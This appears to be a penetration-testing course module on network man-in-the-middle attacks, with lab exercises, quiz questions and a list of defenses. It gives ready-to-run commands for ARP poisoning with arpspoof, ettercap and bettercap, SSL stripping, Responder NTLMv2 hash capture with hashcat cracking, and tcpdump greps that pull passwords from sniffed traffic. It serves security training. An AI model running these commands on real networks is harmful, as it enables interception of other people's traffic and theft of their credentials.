Network Attacks & Man-in-the-Middle
Execute network-level attacks — ARP poisoning, MITM traffic interception with Wireshark, Responder for credential capture, and network protocol exploitation.
Learning Objectives
- → Perform ARP poisoning to intercept network traffic with arpspoof
- → Capture and analyze network traffic with Wireshark and tcpdump
- → Use Responder to capture NTLMv2 hashes from Windows clients
- → Exploit insecure protocols: Telnet, FTP, HTTP credential sniffing
- → Understand SSL/TLS protection and MITM limitations against HTTPS
ARP Poisoning (ARP Spoofing)
How ARP Works
Normal ARP:
192.168.1.100 asks: "Who has 192.168.1.1? Tell me your MAC"
192.168.1.1 replies: "192.168.1.1 is at AA:BB:CC:DD:EE:FF"
ARP is unauthenticated — anyone can reply to any ARP request!
ARP Poisoning Attack
Attack:
Attacker sends gratuitous ARPs:
"192.168.1.1 (router) is at ATTACKER_MAC" → sent to all hosts
"192.168.1.100 (victim) is at ATTACKER_MAC" → sent to router
Result:
Victim's traffic → Attacker → Router (intercepted!)
Router traffic → Attacker → Victim (intercepted!)
Tools for ARP Poisoning
# arpspoof (dsniff)
echo 1 > /proc/sys/net/ipv4/ip_forward # enable forwarding
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP
# ettercap (GUI and CLI)
ettercap -T -q -M arp:remote /VICTIM_IP// /GATEWAY_IP//
# -T text mode, -q quiet, -M arp:remote MITM
# bettercap (modern, feature-rich)
bettercap -iface eth0
net.probe on -- discover hosts
arp.spoof on -- start ARP spoofing
net.sniff on -- capture traffic
Wireshark – Traffic Analysis
Wireshark — GUI packet analyzer
tcpdump — CLI packet analyzer (scriptable)
# Capture traffic
sudo wireshark &
# Select interface → Start
# Useful display filters:
http — HTTP traffic
http.request.method == "POST" — POST requests only
ftp — FTP (credentials in clear)
telnet — Telnet sessions
smtp — Email credentials
credentials — Wireshark's credential detection
# Follow stream:
Right-click packet → Follow → TCP/HTTP Stream
# Reconstruct full conversation
# Export credentials:
Edit → Find Packet → String → "password"
tcpdump
# Capture all traffic
sudo tcpdump -i eth0 -w capture.pcap
# Filter by host and port
sudo tcpdump -i eth0 host 192.168.1.100 and port 80
# Capture only HTTP (port 80) and FTP (port 21)
sudo tcpdump -i eth0 port 80 or port 21 -w web_ftp.pcap
# Read saved capture
tcpdump -r capture.pcap -n
# Extract credentials from HTTP
tcpdump -r capture.pcap -A | grep -i "password\|pass=\|user="
# Real-time credential display
tcpdump -i eth0 -A -s0 port 80 | grep -i "pass\|user\|login"
Responder – LLMNR/NBT-NS Poisoning
# How Responder works:
# Windows tries: DNS → LLMNR → NBT-NS
# If DNS fails, broadcasts LLMNR/NBT-NS query
# Responder answers: "I am the host you're looking for!"
# Windows sends NTLMv2 authentication to Responder
# Responder captures the hash
# Start Responder:
responder -I eth0 -wF
# -w Web proxy capture, -F Force NTLM auth
# Output: captured NTLMv2 hashes in /usr/share/responder/logs/
# Crack with hashcat: -m 5600 hashes.txt rockyou.txt
# Trigger scenarios:
# Windows user types: \nonexistent-server (UNC path)
# Shared printer with wrong hostname
# Browser proxy auto-discovery (WPAD)
SSL Stripping
# SSL stripping downgrades HTTPS to HTTP
# Requires ARP poisoning first (MITM position)
# Tool: bettercap
bettercap
net.sniff on
arp.spoof on
http.proxy on -- intercept HTTP
https.proxy on -- act as TLS proxy
set http.proxy.sslstrip true -- strip SSL
# Defense: HSTS preloading prevents SSL stripping
# Browsers refuse HTTP for HSTS domains even if stripped
Protocol-Specific Attacks
# Telnet — plaintext!
sudo tcpdump -i eth0 port 23 -A | grep -v "^$"
# Full session visible in plaintext
# FTP — plaintext credentials
sudo tcpdump -i eth0 port 21 -A | grep -E "(USER|PASS)"
# HTTP Basic Auth — base64 encoded (not encrypted!)
# Authorization: Basic YWRtaW46cGFzc3dvcmQ=
echo "YWRtaW46cGFzc3dvcmQ=" | base64 -d
# admin:password
# SMTP — email credentials
sudo tcpdump -i eth0 port 25 -A
# AUTH LOGIN: base64 username/password
# DNS sniffing — map internal hostnames
sudo tcpdump -i eth0 port 53 -n | grep -E "(A|CNAME|PTR)"
Defense Against MITM
1. HTTPS everywhere (TLS) — even with MITM, traffic encrypted
2. HSTS + preloading — prevents SSL stripping
3. Certificate pinning — mobile apps check specific cert
4. Network segmentation — isolate sensitive systems
5. 802.1X NAC — authenticate before network access
6. Dynamic ARP Inspection (DAI) — switch-level ARP protection
7. DNSSEC — signed DNS responses
8. IPv6 RA Guard — router advertisement protection
9. VPN — encrypted tunnel even on untrusted networks
On an isolated lab network with two VMs: (1) enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward, (2) launch arpspoof against victim and gateway, (3) start Wireshark on attacker machine, (4) from victim VM: browse to an HTTP website and log in, (5) observe credentials captured in Wireshark, (6) follow the TCP stream to see full HTTP conversation.
Why must IP forwarding be enabled during ARP poisoning?
What does 'Follow TCP Stream' in Wireshark do?
On a network with a Windows machine: (1) start Responder: responder -I eth0 -wF, (2) trigger LLMNR: from Windows VM, open File Explorer and type \nonexistent-server, (3) observe Responder capturing NTLMv2 hash, (4) copy hash to hash.txt, (5) crack with hashcat -m 5600 hash.txt rockyou.txt, (6) verify cracked password by authenticating to the Windows VM.
What is LLMNR and why does it enable Responder attacks?
Analyze a provided packet capture (or capture live traffic): (1) extract all HTTP credentials: tcpdump -r cap.pcap -A | grep -i pass, (2) find FTP credentials: filter port 21, (3) decode HTTP Basic Auth: base64 decode Authorization header, (4) identify DNS queries to map internal hosts, (5) find any credentials in Telnet sessions.
Why is HTTP Basic Auth insecure even though it looks different from plaintext?